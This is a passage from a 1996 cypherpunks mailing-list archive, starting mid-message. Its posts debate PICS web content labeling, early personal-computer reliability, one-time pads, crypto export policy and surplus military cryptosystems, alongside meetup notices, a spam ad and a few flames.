engineers off the new-item rollout team and replaced them with IBM PC
dodos who knew nothing about HP. This is very similar to what Volkswagen
did when they dumped the reliability ads for the Beetle and started
cranking up the sexy ads for the Rabbit.  That's when Honda started to
eat Volkswagen's lunch, 20 years and running.  I can see clearly where
this strategy put HP a lot of years behind the competition.  You will
recall, of course, that HP started this whole thing with the first-ever
personal (take it home and plug it in and start programming in Fortran
immediately) computer, the 2116A, in 1966.  Expensive, yes, but still
by every technical account a personal computer.

In case you haven't noticed, and in spite of HP being full of assholes
these days (I don't use that term lightly), HP has gained market share
in PCs (not just printers) against Apple and IBM by a factor of several
times.  HP is now #2 in the PC server market, for example.  How Compaq
got to be #1 I don't know, since when I worked in Pasadena we couldn't
leave the machines on all day, since none of them would last more than
3 weeks that way.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 8 Dec 1996 10:17:27 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Laptops and TEMPEST
In-Reply-To: <199612080126.TAA27410@manifold.algebra.com>
Message-ID: <32AB05C0.346C@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> Lucky Green wrote:
> >     If you really need to keep your information processing
> >     "private", then you can either isolate yourself inside
> >     a double-shielded room of solid copper; power everything
> >     with batteries; have no wires leading out of that room;
> >     make damned sure the door has the nice secure wiping strips
> >     to complete the shield when you close it -- or move your
> >     information processor into the middle of a whole bunch of
> >     the same or worse RF/RFI/EMI emitters, and just _maybe_
> >     your data will get lost or become inaccessible because
> >     of the overload of the detection equipment by much larger
> >     interference fields.  Or use paper, pencil, and one-time pads
> >     and burn everything that's done "in the clear" and really
> >     scrunch the ashes into dust.
> > [Again, I am not the author of the above post.]

> An interesting use of one time pads -- to keep one's own secrets.
> And where to keep the pads themselves?

I apologize sincerely for mentioning this, but in reference to "where
to keep the pads", maybe that's why Don Wood (when he was at NSA)
got into doing what he does.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 8 Dec 1996 08:19:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: KEE_pin
Message-ID: <1.5.4.32.19961208161626.0069f66c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The NYT reports today on the administration's new
national security team and the formulation of policy
to focus on international crime as a national security
threat.

Cited are thriving Russian black marketers selling hardware,
software, and skills developed by the USSR; high-technology 
which has speeded communication and dissolved national 
borders; the diffusion of many enemies rather than a single
superpower.

The nature of crime has changed. No longer limited to drugs,
terrorism and flight from justice, now there's money
laundering, kidnapping, smuggling, credit card scams, even
auto theft.

It describes measures to combat this threat to all nations by 
cooperating and competing foreign affairs, intelligence and 
law-enforcement agencies around the world. None so trusting 
of each other.

Some fund- and purpose-scrambling agencies klaxon that 
international crime is now as grave as nuclear proliferation
and ethnic conflict. The three threats may merge, and new 
nations are at greatest peril.

Which supports the administration's bulldogged clamp on 
crypto export limits: if we knew what they knew about
rogue, ex-officials arranging their future with successors
inside -- they need to communicate in private.

What crypto will Perry, Deutch and consorts use to keep
secrets among the few who know what we don't -- yet? 

Cryptanalysts, dissolve borders set by secret pacts.

-----

KEE_pin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 8 Dec 1996 11:42:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: [CRYPTO] PGP
Message-ID: <199612081938.LAA31429@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C[retin] May's IQ is lower than the 
belly of a pregnant snake.

      . o       c ,
      `'#v-- --v#`' Timothy C[retin] May
       /'>     <`\




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sun, 8 Dec 1996 11:45:58 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: The Science Generations
In-Reply-To: <199612080818.AAA05597@netcom7.netcom.com>
Message-ID: <v03007800aed0cb8685a0@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 AM -0800 12/8/96, Dale Thorn wrote:
>The phrase "your beloved HPs" gives your hand away.

What hand?  You appeared by your statements to be a lover of HP stuff.  I
now find it was only from that era.

My of my hand is only to say that people DID use them other things for real
business uses.  Your posts appeared to say that was impossible.  However,
as Bob Hettinger says, "Reality is not optional."


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Sun, 8 Dec 1996 10:23:32 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Re: cypher-PUNKS...
Message-ID: <199612081821.MAA12262@cdale3.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: dlv@bwalk.dm.com, cypherpunks@toad.com
Date: Sun Dec 08 12:22:55 1996
> Timmy posted a series of message via anonymous remailers
> praising himself and calling himself "a genius among geniuses" or some
>  such.

That charge is every bit as foundless as the charges that you are
responsible for the "A Daily Warning Regarding Tim May" posts
of a while back, or the current round of remailed messages featuring
the sickeningly cutesy ASCII graphics at the bottom.

OTOH, if you've discovered a way to gain access to the remailers in
such a fashion as to prove those messages originated from Tim May,
please share.  (It just might be crypto-relevant, which would be
a small miracle on the cypherpunks list these days :)

> What a moron.
I'm not even touching that sentence.  It's just too tempting.


- ----- David Smith, Thinker of Deep Thoughts  :)
http://www.prairienet.org/bureau42/library.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMqsHlnEZTZHwCEpFAQF7iwf9Ers31ZMzVyKglW2DON71s/x9w9iqPlzV
ISWZLyJPNjzUkrhg67XGAuumaJB+gmSYmnnn4xVfW1bmBHD2r3p+d0zG7sE0vc/e
M2YlMq7b3oUv7XcRRRwAycasboqidpsNoQUq3eiwcraHessYIKSm6PezOgjB+DOG
rC9u+zirILrjmS7F6wizHB5Eex/VnK9kwbBmpOmGVPuS+muxeEF1GONeuRI+cibD
Q0M8PqTyPuSA/T2AD6IIH51hAf0+nTxrxUzfioK8/OAMYnk3gdhJzsi7SfK8fzdJ
SjqdqI5fJ4RGVy7p3GHthnS8d70VMcoTwaWAeETQvsuugd24bLowYg==
=yaDS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Sun, 8 Dec 1996 09:31:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Gosh, now I feel much better...
Message-ID: <199612081731.MAA42352@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sun Dec 08 12:31:18 1996

http://www.usnews.com/usnews/issue/9arms.htm

Has an interesting story by by Peter Cary, Douglas Pasternak and Penny Loeb, 
about big mother's great care in disposing of munitions; including, but not 
at all limited to, encryption. For sale are attack helicopter partss, bombs, 
missiles, guidance systems, howitzer parts, computers, and yes, military 
cryptosystems.

While by law all these things are supposed to be demilitarized, they aren't 
in many cases. They are instead evidently sold as scrap (and at scrap 
prices) and go to nice countries like China. If it were closer to April 1st, 
I would doubt this story is real. <sigh>

According to the assistant U.S. attorney in Sacramento, "The scope of this 
program and the amount of materiel going out the door is so huge, people 
normally don't believe you. Only the government could have a program where 
they give everything away for free and they screw it up."

Couldn't have said it better myself...
JMR


Regards, Jim Ray
DNRC Minister of Encryption Advocacy

One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Please note new 2000bit PGPkey & address <jmr@shopmiami.com>
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMqr7ajUhsGSn1j2pAQG8dAfQrBqvkOgXWaT507n5mxYX7kGYDr2hSEz+
cgVkTlipih2ThLRfLWlgO8+cwodifUkQDCAdpA1GKqCJL08ZBdnRex+ecygcrKP/
84pIa2PfOtpeK6Srggpp8X5/aodBDlsZR2n++rJA1b65m6T54g6LvDrEwiv9dStR
/4VaMGlAz465XbgjPmCQ5ME44p7cKk0ZQ/Q3kKdpyZTfRC6H+Xl1PVQq87dm1eYQ
ibyA3VzFRGAIy9lLdMW4RuGoCqw0yKpdaVY8Bjhv8LVWUkETADbfCWPG3gXmkpV/
Hm4tEvdtV99wXygyjTBd1zlbKTuZa0GPd46reBJlo5Xylg==
=kZ+Z
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Sun, 8 Dec 1996 09:31:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Gosh, now I feel _much_ better...
Message-ID: <199612081731.MAA15546@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sun Dec 08 12:31:34 1996

http://www.usnews.com/usnews/issue/9arms.htm

US News has an interesting story by by Peter Cary, Douglas Pasternak and 
Penny Loeb, about big mother's great care in disposing of surplus munitions; 
including, but not at all limited to, the encryption variety. For sale are 
attack helicopter parts, bombs, missiles, guidance systems, howitzer parts, 
computers, and yes, military cryptosystems.

While by law all these things are supposed to be "demilitarized," they 
aren't, in many cases. They are instead evidently sold as scrap (and at 
scrap prices) and go to nice countries like China. Maybe I'm missing 
something or being fooled, if it were closer to April 1st, I would doubt 
that this story is real.

According to an assistant U.S. attorney in Sacramento, "The scope of this 
program and the amount of materiel going out the door is so huge, people 
normally don't believe you. Only the government could have a program where 
they give everything away for free and they screw it up."

I couldn't have said it better myself... <sigh> And *they* think _WE_ need 
more "gun control."
JMR


Regards, Jim Ray
DNRC Minister of Encryption Advocacy

One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Please note new 2000bit PGPkey & address <jmr@shopmiami.com>
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMqr7ezUhsGSn1j2pAQEybwfPSUQ4pPXDFtCBvMAoBXpSQm7QcY3Qp/Dr
jVFrHhxuyTz+jpcHMxE9AKt468UL60CrVVNZ/vPYlz9/nuabHVgKEB5F9hvuR7zj
jP67eGpeO5ck3vttQDiyvB3DzkaSqaJVre01dXoL3OenXRYnd7HVLg2S8HzdERqv
gIHMIbFE5wMd7wjG7YkCwzVFVD7aK+erxuuI0lNA8b8/sfEkhdJUw1FMOJsIUh6R
qbQi4GFipIcTuUcipYiKgq73gb7b9KTT9SvERQ9i2acfPIBPILoi0vsJc+46Dukh
CC0pFdpDbvefYYqeAiPEzUMdQY5PxLtSVp+Wk5pRvnVw+A==
=DQYX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Sun, 8 Dec 1996 10:32:33 -0800 (PST)
To: jim@santafe.arch.columbia.edu
Subject: New York Area CPUNKS meet
Message-ID: <3.0.32.19961208131249.006b2f50@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The NewYork City area Cypherpunks will meet on the UpperWest Side of
Manhattan.
Date: Thursday 12/19/96
Time: 7:30 PM
Place: The Club. Park Royal Hotel, 23 West 73rd Street. Between Columbus &
Amsterdam Avenue.
Subway stops: 72nd & Broadway #1 #9 #2 #3 (express stop)
	           72nd & Central Park West  A or D trains
Refreshments: BYOB & snacks. We can order out for dinner.

All our welcome but please email me your intention to attend (if you have
not already done so.)

Marc	

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMqsDk2eikzgqLB7pAQHxFgP9FbdXYo4qiubH9zBFW+CdQb5LZVxKAhWB
EwfV+2EquVT94dokYMN9P0n26ZIozJejpXf44QLLgNPvWHqHB8Wult/U7zyVeVid
1YVRftVFnxPlBjkabH5yGR8efP7L2i5Ynh5X8I0jFy9G8Wfilxsg8QT8r+eYtDWB
g/b4Wpr0/0w=
=CIyV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Kimmel <sakwad@earthlink.net>
Date: Sun, 8 Dec 1996 14:28:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: info
Message-ID: <32AADE6F.8AB@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 8 Dec 1996 15:51:29 -0800 (PST)
To: camcc@abraxis.com (Alec)
Subject: Re: Please post Eudora PGP plugin URL
Message-ID: <3.0.32.19961208153244.006a7474@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:31 PM 12/7/96 -0500, Alec wrote:
>At 04:57 PM 12/6/96 -0800, you wrote:
>:Or Email it to me 
>:
>:
>:Thanks in advance
>:
>You're welcome
>
>-----------------------------------------------------
>Eudora/PGP Plug-In
[...]

>If you want to be automatically notified of new versions, send e-mail to
>gt6525c@prism.gatech.edu with the subject of "eppi news", and the following
>message body:

Just FYI, while the plugin is still available, email to this address has
been bouncing for weeks. It is therefore impossible to submit bug reports
or subscribe to the EPPI mailing list. If somebody on this list knows the
current address of the EPPI author, please post it.

Thanks,




-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 8 Dec 1996 15:51:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
Message-ID: <3.0.32.19961208154000.006adf40@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:15 PM 12/7/96 -0800, Thaddeus J. Beier wrote:
>I don't think that PICS will be mandated any more than those two standards
>are mandated, perhaps I'm naive, but I think that the social conventions
>will work in this case.

Let's put the question if something like PICS will be mandated aside for
the moment. Do you agree that sites that deliberately mislabel their
content, will eventually face legal action? If so, then PICS should not be
considered truly voluntary.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 8 Dec 1996 17:28:39 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: The Science Generations
In-Reply-To: <199612080818.AAA05597@netcom7.netcom.com>
Message-ID: <32AB6AAA.79D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote:
> At 10:10 AM -0800 12/8/96, Dale Thorn wrote:
> >The phrase "your beloved HPs" gives your hand away.

> What hand?  You appeared by your statements to be a lover of HP stuff.
> I now find it was only from that era.
> My of my hand is only to say that people DID use them other things for
> real business uses.  Your posts appeared to say that was impossible.
> However, as Bob Hettinger says, "Reality is not optional."

First, let me apologize for something I try never to do.  When someone
sends private email, if I put it to the list I should remove the sender's
name (if no permission given).

I still use HP personal computers, since (despite their problems) they
are still the most effective at running for a long time and processing
a lot of data.  As far as showing your hand, I find it interesting how
many erstwhile serious users will nonetheless wave away any discussion
of the specific problems computers have (particularly the early ones),
which I can only relate to denial.  In the words of Consumer Reports
back in the early-mid 1980s, "These electronic items are the least
reliable and most problematic things we've ever tested" (quote approximate).

I never said it was impossible to use an Apple (or early IBM) for serious
work of *some* kind, i.e., simple spreadsheet work.  What I said and I
hope it came through is this:

If you were using an IBM mainframe in the period 1980-1982 or thereabouts,
you would have what I call unreliable equipment, but, you would probably
also have IBM person(s) on site to keep the stuff running.  On the other
hand, IBM PC users (outside of large corporate sites) didn't necessarily
have that luxury, therefore, if they tried to do what I could easily do
with HP personal computer equipment, their IBM PCs would die and have to
be fixed "by the dealer", with more consequent unreliability added.

How many people have you heard of who could run databases on an IBM or
Apple II floppy system, entering data with fairly large files and several
indexes, and searching and printing the data almost continuously?  Those
people who know what I'm talking about should have a good laugh on that one.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 8 Dec 1996 17:55:41 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: PICS is not censorship
Message-ID: <3.0.32.19961208175430.006c1ac0@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:52 PM 12/8/96 -0800, Lucky Green wrote:

>Let's put the question if something like PICS will be mandated aside for
>the moment. Do you agree that sites that deliberately mislabel their
>content, will eventually face legal action? If so, then PICS should not be
>considered truly voluntary.

Self-labeling is useless without regulation and punishment - there's too
much incentive to treat the label like a marketing tool. My hunch is that
courts will never allow compulsory labeling at the level that most people
would want - my bet is that labeling re visual depictions of nudity/sex can
be mandated, but that labeling re editorial/political content can't be.
(I'm not saying I think a fair reading of the Constitution says that, I'm
saying I think that's the compromise that judges will come up with.) And
labeling that keeps kids from seeing female breasts but lets them find out
about where to get abortions, or how to do their own at home*, or that lets
kids see home pages about how it's OK to be gay or a nazi or a nerd or a
creationist or a Republican or whatever isn't going to serve the needs of
the people who want to impose a strict content-control regime on their
kids, or on the net. And while my faith in the judiciary is pretty weak, I
just don't think they'll go so far as to say that the Constitution allows
the government to force people to put subject labels on their web pages. 

*(circa 1991, there was a videotape circulating in keep-abortion-legal
activist circles which described and showed how to perform an early-term
abortion using relatively simple technology (e.g., suction) - I can't seem
to remember the medical term for the procedure, but the tape was intended,
a la PGP, to make the technology available while it was still legal to
discuss it. Someone must have ported this video to Quicktime by now.) 

Third party labeling/rating is a much superior solution because it allows
the labelers to examine data with a mindset compatible with the mindset of
the customer, which source-labeling, nor automated filtering, will never
do. Here's to hoping that  regulators/legislators won't get around to
imposing a source-labeling scheme before experience is able to show them
that it's neither necessary nor sufficient to reach their goals. 

--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sun, 8 Dec 1996 18:41:04 -0800 (PST)
To: cryptography@c2.net
Subject: Mykotronx update
Message-ID: <1.5.4.32.19961209024043.005a5b30@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Remember Mykotronx, makers of the Clipper Chip?  Apparently, they were
bought in 1995 by Rainbow Technologies, http://www.rnbo.com/, who make 
dongles and crypto accelerator boards.  Some quotes from their web page:

http://www.rnbo.com/mykoweb/geninfo.htm
        Headquarted in Torrance, California, Mykotronx employs approximately
        110 people. The company was founded in 1979 as Myko Enterprises; 
        it incorporated and became Mykotronx, Inc. in 1987. 
        In 1995, Mykotronx became a part of Rainbow Technologies Inc. 
        (NASDAQ: RNBO), a world leader for intellectual property protection. 
....
        Anticipating higher production volumes, in October 1995, 
        Mykotronx opened a new facility that has dramatically enhanced its
        capacity for testing and programming cryptographic microprocessors. 
        The facility expands annual programming and test capability to more 
        than 1.2 million devices, with potential expansion to 5 million
units. 

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
#     (If this is posted to cypherpunks, I'm currently lurking from fcpunx,
#     so please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sun, 8 Dec 1996 19:31:51 -0800 (PST)
To: Lucky Green <shamrock@netcom.netcom.com>
Subject: Re: PICS is not censorship
Message-ID: <199612090318.TAA02510@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green <shamrock@netcom.netcom.com> says:

> ..Do you agree that sites that deliberately mislabel their
> content, will eventually face legal action? If so, then PICS should not be
> considered truly voluntary.

I think that most of the PICS labels that are on web pages will be those
generated by scripts from groups like RSACi. (http://www.rsac.org)
These groups have contracts that require you to not lie when you fill out their
questionnaires, and if you do lie, you are in breach of contract and should expect
to be sued by them.

These companies should create a cryptographic signature for their labels,
I'm really surprised that RSACi doesn't do that yet; I don't know if other
PICS labelers do.

If you just make up your own PICS label, then I can't believe that you would
have any problems saying whatever you want.  Of course, it's likely that most
of the Surfwatch type programs will have options to block all pages without a
well-known label attached to it, and this will probably be the default in a
couple of years.

If this is the way it works out, then I'd consider this voluntary.  I think that
this is the way it will work out, too.

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Visual Effects Supervisor                408) 287-6770
   Hammerhead Productions  http://www.got.net/people/thad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 8 Dec 1996 19:30:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: To all IETF attendees
Message-ID: <3.0.32.19961208193102.00683fd4@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Any Cypherpunks attending this weeks IETF meeting in San Jose are
encouraged to send me some email if you want to get together.




-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://ourworld.compuserve.com/homepages/justforfun/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryondp@aol.com
Date: Sun, 8 Dec 1996 16:48:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: take me off the list
Message-ID: <961208194747_1953081358@emout15.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


take me off the list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Kozubik <kozubik@shoelace.FirstLink.com>
Date: Sun, 8 Dec 1996 18:52:04 -0800 (PST)
To: Mark Allyn 206-860-9454 <allyn@allyn.com>
Subject: Re: New payment scheme for Web access
In-Reply-To: <199612030247.SAA20429@mark.allyn.com>
Message-ID: <Pine.SOL.3.91.961208195031.17411B-100000@shoelace.FirstLink.com>
MIME-Version: 1.0
Content-Type: text/plain


> walked out of the corner store with a candy bar when I was a little
> boy without paying for it. When I reached the house, I discovered that 
> I had the candy bar in my hand and I **RAN** crying back to the store and
> put it back on the shelf.


Good Dog.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 8 Dec 1996 20:37:17 -0800 (PST)
To: thad@hammerhead.com (Thaddeus J. Beier)
Subject: Re: PICS is not censorship
Message-ID: <3.0.32.19961208203718.00692ac8@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/enriched

At 07:18 PM 12/8/96 -0800, Thaddeus J. Beier wrote:
>I think that most of the PICS labels that are on web pages will be those
>generated by scripts from groups like RSACi. (http://www.rsac.org)
>These groups have contracts that require you to not lie when you fill out their
>questionnaires, and if you do lie, you are in breach of contract and should expect
>to be sued by them.

So what is going to happen if I generate one of their tags from scratch without filling out their questionnaire? Are they going to sue me, claiming that they own an html tag? Can one own an html tag?





-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
Make your mark in the history of mathematics. Use the spare cycles of
your PC/PPC/UNIX box to help find a new prime.
http://ourworld.compuserve.com/homepages/justforfun/prime.htm


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sue1968@ix17.ix.netcom.com
Date: Mon, 9 Dec 1996 06:04:41 -0800 (PST)
To: Sue1968@ix.netcom.com
Subject: A Message From Sue
Message-ID: <199612090548.VAA12554@dfw-ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Please excuse this intrusion into your mailbox, but I would like to
tell you about something which will be of interest to you.

About a year ago, I purchased two personalized children's books for my
kids and they have  been such an incredible hit with them that the
parents of several of their friends have gone out and purchased the
books for their own kids.  I've also ended up buying several more as
gifts.  This gave me the idea of becoming a distributor for these
great books.

The books are all made with highly durable, hard cover bindings and
have tons of full color illustrations.  Your child's name and the
names of their friends are woven into the story and appear on every
page.  They not only hear the story, they're actually a part of it and
no other book has inspired my children to want to read more than these
books have.  Whether it's for your own child or for another child you
care about, these books make the perfect gift, especially with the
holiday season approaching.

It's impossible for me to describe these books well enough to do them
justice, so instead, I would like to invite you to visit my web site
at:

http://www.steppingstones.com

<A HREF="http://www.steppingstones.com">Click here to go to the
website www.steppingstones.com</A>

There you will find pictures of each of the books I offer and a more
complete description.  I'm so sure you'll love these books as much as
I do, that I'm offering a 100% money back guarantee if you're not
completely satisfied.

We are currently offering a Holiday Special: For every book you order
at the regular price of only $12.95 you can order another for 1/2
price!!!  In order to claim this special offer, you must include
Invitation # 192 on your order form.  Note: All orders for Christmas
must be placed by Wednesday December 18th in order to ensure on time
delivery!!!!!!!!!! 

Thanks for taking the time to read this.  If you are not interested,
please pass it on to a friend who might be, or simply hit delete.

Have a great day!!!

Sue :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Sun, 8 Dec 1996 22:28:46 -0800 (PST)
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PICS is not censorship
In-Reply-To: <3.0.32.19961208154000.006adf40@netcom14.netcom.com>
Message-ID: <961208.231901.9L7.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, shamrock@netcom.com writes:

> Let's put the question if something like PICS will be mandated aside for
> the moment. Do you agree that sites that deliberately mislabel their
> content, will eventually face legal action? If so, then PICS should not be
> considered truly voluntary.

A thought:  The way you word your question is likely the way any
regulation will be worded, to wit "mislabeling the content".  I wonder
what might happen to sites that deliberately label their content as
offensively as possible, even though the content is actually benign.
Certainly this is "mislabeling", but you want to bet whether this
inversion gets prosecuted?
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMquiAxvikii9febJAQGzHgP/RQ1aKrc/sUr6YcSI3WUxtJgEMBo7SA48
sY6MF13HcZ12yRNrawp8Dfh5WGAesjCTPiOeNhQSVLNUlShr7U1aEJYFWmFPf9qM
HkMkZyEWlrMMRvOTc0AbQD3is7aQT4z0WUDwa8T+psRFc1FZYHmvtgm5Qah2FD+M
L8R8GxIoGdw=
=CtSM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 9 Dec 1996 00:11:56 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: PICS is not censorship
Message-ID: <3.0.32.19961208235541.006c69d4@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:37 PM 12/8/96 -0800, Lucky Green wrote:
>>>> 
At 07:18 PM 12/8/96 -0800, Thaddeus J. Beier wrote:
>I think that most of the PICS labels that are on web pages will be those
>generated by scripts from groups like RSACi. (http://www.rsac.org)
>These groups have contracts that require you to not lie when you fill out
their
>questionnaires, and if you do lie, you are in breach of contract and
should expect
>to be sued by them.

So what is going to happen if I generate one of their tags from scratch
without filling out their questionnaire? Are they going to sue me, claiming
that they own an html tag? Can one own an html tag?

"Owning" an html tag is oversimplifying things; but claiming that you've
been rated a certain way by a certain group (if you haven't) could
potentially create fraud, trademark, and (maybe) copyright problems - an
easy analogy is to the "UL" and "Good Housekeeping" symbols displayed on
some consumer goods.

--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robin Whittle" <firstpr@ozemail.com.au>
Date: Sun, 8 Dec 1996 09:27:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
Message-ID: <199612081726.EAA20762@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


I agree to a certain extent with Timothy May about the potential for
content labelling of Internet resources being made compulsory in the
US.  The country seems at times to be run be run by nutcases and
their elected representatives. There are huge swings in fashion
regarding prohibition, liberty etc.

To the extent that this is a risk, lets hope it is only an American
problem.  I understand that the Australian Broadcasting Authority
http://www.dca.gov.au/aba/invest.htm does not recommend compulsory
labelling.

thad@hammerhead.com (Thaddeus J. Beier) wrote:

> I suppose the a better solution would have been to have many competing
> private rating services, but PICS will work well, not put much load on
> the net, and is transparent and simple.  I like it.

This may be seen to imply that PICS is a ratings service or a single 
set of values.  It is not. PICS is a protocol for labelling things, 
either within themselves or labelling them remotely.  There can be 
any number of value systems for labelling things.  See my site for 
links to the PICS site and some discussion.

